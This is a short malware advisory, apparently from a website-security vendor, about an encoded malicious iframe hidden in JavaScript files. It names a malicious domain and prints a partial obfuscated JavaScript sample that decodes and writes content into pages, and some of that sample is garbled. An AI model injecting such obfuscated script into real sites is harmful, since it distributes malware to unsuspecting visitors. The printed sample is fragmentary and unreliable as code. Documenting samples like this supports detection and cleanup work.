Description:
Malicious iframe heavily encoded and hidden inside a javascript file. It is often used to distribute malware from external web sites while not being visible to the user.
Domains used in this attack:
vjuivlmfc.in/index.php?tp=5f78ef19a003f5d1
Affecting:
Any web site sites (no specific target)
Clean up:
This malware is generally hidden inside the javascript files. Sign up here to get it clean up: Signup
Malware dump (sample of malware):
GuyUv1lxc = VwbkwJFvt.split(' ');
for (YmIlo1t = 0; YmIlo1t < GuyUv1lxc.length; ++YmIlo1t) {
var ew75N3yP8QqYeiX=GuyUv1lxc[YmIlo1t]; Pj7MCtI76B = ew75N3yP8QqYeiX
for ( var L002XeZv88NKP = 1; L002XeZv88NKP <= 59/2; L002XeZv88NKP++) {
idNR0UBopx = (ew75N3yP8QqYeiXew75N3yP8QqYeiX) % 115
Pj7MCtI76B = (idNR0UBopxPj7MCtI76B) % 115
} aO200AFut = aO200AFut+fQsJC.substr(Pj7MCtI76B,1) } return aO200AFut } document.write(result())